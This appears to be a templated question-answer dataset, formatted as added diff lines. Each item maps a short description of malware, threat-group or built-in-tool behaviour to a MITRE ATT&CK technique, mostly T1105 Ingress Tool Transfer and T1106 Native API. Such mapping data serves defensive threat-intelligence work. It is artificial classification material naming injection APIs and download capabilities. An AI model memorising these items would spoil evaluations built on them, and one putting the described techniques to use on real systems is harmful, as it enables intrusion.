+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai has been used to deploy other malware including Ninja.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to upload additional malicious files to a compromised machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SeaDuke is capable of uploading and downloading files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seasalt has a command to download additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper may download additional files to execute.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seth-Locker has the ability to download and execute files on a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad has downloaded code from a C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon can download an executable to run on the victim.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark can download additional files from its C2 via HTTP or DNS.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpDisco has been used to download a Python interpreter to `C:\Users\Public\WinTN\WinTN.exe` as well as other plugins from external sources.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpStage has the ability to download and execute additional payloads via a DropBox API.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat can download additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter had the ability to download additional payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot can download and execute a payload onto a compromised system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist has the ability to download additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has the ability to download files on an infected host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sliver can upload files from the C2 server to the victim machine using the upload command.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve has the ability to download files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader downloads a new version of itself once it has installed. It also downloads additional plugins.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can download additional payloads to compromised systems.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish can download additional malware to infected hosts.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SodaMaster has the ability to download additional payloads from C2 to the targeted system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT has the ability to download and execute additional payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang can download additional payloads from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp downloads and executes additional files from a remote server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpicyOmelette can download malicious files from threat actor controlled AWS URL's.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has downloaded and executed additional encoded payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater can download updates and auxiliary modules.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can download files to specified targets.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate has the ability to download files to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE can download additional modules from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TDTESS has a command to download and execute an additional file.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie has the ability to upload and download files to and from the infected host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TURNEDUP is capable of downloading additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TYPEFRAME can upload and download files to the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor has downloaded additional files onto a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest can download and execute payloads in-memory or from disk.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle can download additional tools to enable lateral movement.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla has the ability to act as a second-stage dropper used to infect the system with additional malware.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tomiris can download files and execute them on a victim's system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot downloads several additional files and saves them to the victim's machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can upload, download, and execute files on the victim.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can download additional files and tools from its C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UBoatRAT can upload and download files to the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UPPERCUT can download and upload files to and from the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Unknown Logger is capable of downloading remote files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use a `Put` command to write files to an infected machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VBShower has the ability to download VBS files to the target computer.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VERMIN can download and upload files to the victim's machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and NetSupport Manager RAT-based malware.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VaporRage has the ability to download malicious shellcode to compromised systems.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Vasport can download files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer can download remote files and additional payloads to the victim's machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WEBC2 can download and execute a file.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIREFIRE has the ability to download files to compromised devices.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can download and execute additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Waterbear can receive and load executables from remote C2 servers.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMail can receive data and executable scripts from C2.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can write files to a compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can download additional stages of malware from a Discord CDN channel.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wiarp creates a backdoor through which remote attackers can download files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Linux has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Winnti for Windows dropper can place malicious payloads on targeted systems.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can download files from its C2 server, including the .NET DLLs, `WoodySharpExecutor` and `WoodyPowerSession`.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET downloads browser specific AppleScript modules using a constructed URL with the curl command, https://"" & domain & ""/agent/scripts/"" & moduleName & "".applescript.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can download additional malicious files from its C2 server.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: YAHOYAH uses HTTP GET requests to download other files that are executed in memory.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIPLINE can download files to be saved on the compromised system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZLib has the ability to download files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy obtains additional code to execute on the victim's machine, including the downloading of a secondary payload.","Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZeroT can download additional payloads onto the victim.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda can download additional malware plug-in modules and execute them on the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zox can download files to a compromised machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has a command to transfer files from a remote host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ can download and execute additional files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: build_downer has the ability to download files from C2 to the infected host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: certutil can be used to download files from a given URL.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: cmd can be used to copy files to/from a remotely connected external system.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: down_new has the ability to download files to the compromised host.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: esentutl can be used to copy files from a given URL.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ftp may be abused by adversaries to transfer tools or files from an external system into a compromised environment.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT can download files to the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can download and execute files.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: macOS.OSAMiner has used `curl` to download a Stripped Payloads from a public facing adversary-controlled webpage.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can download files onto compromised systems.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT can download files to the victim’s machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: xCaon has a command to download files to the victim's machine.,"Tecnique: T1105 Ingress Tool Transfer, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used Windows API `ObtainUserAgentString` to obtain the victim's User-Agent and used the value to connect to their C2 server.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors deployed malware that used API calls, including `CreateProcessAsUser`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Sharpshooter, the first stage downloader resolved various Windows libraries and APIs, including `LoadLibraryA()`, `GetProcAddress()`, and `CreateProcessA()`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used the `CreateProcessA` and `ShellExecute` API functions to launch commands after being injected into a selected process.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used the Windows API to execute code within a victim's system.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has used built-in API functions.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used direct Windows system calls by leveraging Dumpert.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group malware has used CreateProcess to launch additional malicious components.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group malware can leverage the Windows API call, CreateProcessA(), for execution.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa has called various native OS APIs.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used the Windows API ObtainUserAgentString to obtain the User-Agent from a compromised host to connect to a C2 server. Lazarus Group has also used various, often lesser known, functions to perform various types of Discovery and Process Injection.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has executed malware by calling the API function `CreateProcessW`.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has leveraged the Windows API, including using CreateProcess() or ShellExecute(), to perform a variety of tasks.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has deployed payloads that use Windows API calls on a compromised host.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has used `WinExec` to execute commands received from C2 on compromised hosts.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has used multiple Windows APIs including HttpInitialize, HttpCreateHttpHandle, and HttpAddUrl.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla and its RPC backdoors have used APIs calls for various tasks related to subverting AMSI and accessing then executing commands through RPC and/or named pipes.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used native APIs including GetModuleFileName, lstrcat, CreateFile, and ReadFile.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL is capable of starting a process using CreateProcess.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira executes native Windows functions such as GetFileAttributesW and `GetSystemInfo`.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has used a variety of Windows API calls, including `GetComputerNameA`, `GetUserNameA`, and `CreateProcessA`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has the ability to use multiple dynamically resolved API calls.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to launch files using ShellExecute.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT has the ability to use OS APIs including `CheckRemoteDebuggerPresent`.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's dispatcher has used CreateProcessW API for execution.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon has used the Windows Crypto API to generate an AES key.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has used a variety of Windows API calls, including `NtCurrentPeb` and `GetLogicalDrives`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can utilize Native API functions such as, `ToolHelp32` and `Rt1AdjustPrivilege` to enable `SeDebugPrivilege` on a compromised machine.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS has a command to download an .exe and execute it via CreateProcess API. It can also run with ShellExecute.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBK has the ability to use the CreatePipe API to add a sub-process for execution via cmd.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk can use multiple Windows API calls for actions on compromised hosts including discovery and execution.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackConfig can leverage API functions such as ShellExecuteA and HttpOpenRequestA in the process of downloading and executing files.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit has used various Windows API calls.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has used the ShellExecuteW() function call.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA().,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can use various APIs to allocate memory and facilitate code execution/injection.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BendyBear can load and execute modules and Windows Application Programming (API) calls using standard shellcode API hashing.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has used the Windows API to communicate with the Service Control Manager to execute a thread.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer has used dynamic API resolution to avoid identifiable strings within the binary, including RegEnumKeyW.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta has the ability to use native APIs for numerous functions including discovery and defense evasion.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BloodHound can use .NET API calls in the SharpHound ingestor component to pull Active Directory data.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoxCaon has used Windows API calls to obtain information about the compromised host.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can call multiple Windows APIs for execution, to share memory, and defense evasion.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can use multiple Native APIs.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CaddyWiper has the ability to dynamically resolve and use APIs, including `SeTakeOwnershipPrivilege`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has used the NtQueryDirectoryFile and ZwQueryDirectoryFile functions to hide files and directories.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes used the CreateFileW() API function with read permissions to access downloaded payloads.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chrommme can use Windows API including `WinExec` for execution.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop has used built-in API functions such as WNetOpenEnumW(), WNetEnumResourceW(), WNetCloseEnum(), GetProcAddress(), and VirtualAlloc().","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike's Beacon payload is capable of running shell commands without cmd.exe and PowerShell commands without powershell.exe,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT can load a PE file from memory or the file system and execute it with CreateProcessW.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti has used API calls during execution.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CostaBricks has used a number of API calls, including `VirtualAlloc`, `VirtualFree`, `LoadLibraryA`, `GetProcAddress`, and `ExitProcess`.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba has used several built-in API functions for discovery like GetIpNetTable and NetShareEnum.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink can use various Linux API functions including those for execution and discovery.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DCSrv has used various Windows API functions, including `DeviceIoControl`, as part of its encryption process.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEADEYE can execute the `GetComputerNameA` and `GetComputerNameExA` WinAPI functions.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus can use various API calls to see if it is running in a sandbox.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate uses the native Windows API CallWindowProc() to decode and launch encoded shellcode payloads during execution. DarkGate can call kernel mode functions directly to hide the use of process hollowing methods during execution.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can use a variety of API calls for persistence and defense evasion.,"Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis used the IsDebuggerPresent, OutputDebugString, and SetLastError APIs to avoid debugging. Denis used GetProcAddress and LoadLibrary to dynamically resolve APIs. Denis also used the Wow64SetThreadContext API as part of a process hollowing process.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol has used several API calls like `GetLogicalDriveStrings`, `SleepEx`, `SystemParametersInfoAPI`, `CryptEncrypt`, and others to execute parts of its attack.","Tecnique: T1106 Native API, Tactic: TA0002 Execution"
